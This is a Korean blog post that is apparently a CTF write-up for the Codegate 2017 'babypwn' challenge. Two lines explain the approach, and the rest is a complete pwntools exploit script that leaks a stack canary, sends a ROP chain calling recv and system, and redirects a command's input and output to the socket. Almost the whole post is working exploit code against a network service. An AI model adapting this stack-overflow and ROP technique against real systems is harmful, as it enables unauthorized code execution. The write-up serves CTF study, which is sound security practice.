반응형

babypwn



전형적인 bof 문제다 ROP 사용하면 해서 system 실행시키고


소켓으로 fd redirect 시켜서 플래그 확인해면 됌


아래는 Exploit.py



from pwn import *

con = remote("192.168.0.14", 9191) # local
#con = remote("110.10.212.130", 8888) # codegate

def dummy():
	con.recvn(276)

def canary_leak():
	print "[*] Canary Leak"
	con.recvuntil("3. Exit\n")
	con.recvuntil("===============================\n")
	con.send("1\x00")
	con.recvuntil("Input Your Message : ")
	con.sendline("A"*40)
	con.recvn(40)
	canary = con.recvn(4)[::-1]
	print "canary : " + hex(int(canary.encode("hex"), 16))
	return int(canary.encode("hex"), 16)

def ROP():
	canary = canary_leak()
	print "[*] ROP Stage"

	worker = 0x08048A71
	pop3ret = 0x8048eec
	system_plt = 0x8048620
	recv_plt = 0x80486e0
	bss = 0x804b1b4

	gadget = "/bin/ls 0>&4 1>&4\x00"

	print "[*] Pre-Payload Send"
	con.recvuntil("3. Exit\n")
	con.recvuntil("===============================\n")
	con.sendline("1")
	con.recvuntil("Input Your Message : ")

	payload  = ""
	payload += "A" * 40
	payload += p32(canary)
	payload += "B" * 12
	
	payload += p32(recv_plt)
	payload += p32(pop3ret)
	payload += p32(0x04) # socket
	payload += p32(bss)
	payload += p32(len(gadget))
	payload += p32(0x00)
	payload += p32(system_plt)
	payload += p32(0x41414141)
	payload += p32(bss)

	con.sendline(payload)

	print "[*] Canary Null Inject"
	con.recvuntil("3. Exit\n")
	con.recvuntil("===============================\n")
	con.sendline("1")
	con.recvuntil("Input Your Message : ")

	payload  = ""
	payload += "A" * 40
	payload += "\x00"

	con.send(payload)

	print "[*] Triggering"
	con.recvuntil("3. Exit\n")
	print con.recvuntil("===============================\n")
	con.sendline("3") # triggering

	con.sendline(gadget)

	con.interactive()

ROP()


'Write up > CTF' 카테고리의 다른 글

[RCTF 2017] RCalc  (0) 2017.05.22
[Codegate2017 Pre] EasyCrack101  (0) 2017.02.11
[Codegate2017 Pre] BabyMISC  (0) 2017.02.11
[RC3 2016] IMS-easy (150pt) *수정  (0) 2016.11.20
[CSAW_2014] Xorcise(Pwnable500)  (0) 2016.07.30
블로그 이미지

KuroNeko_

KuroNeko

,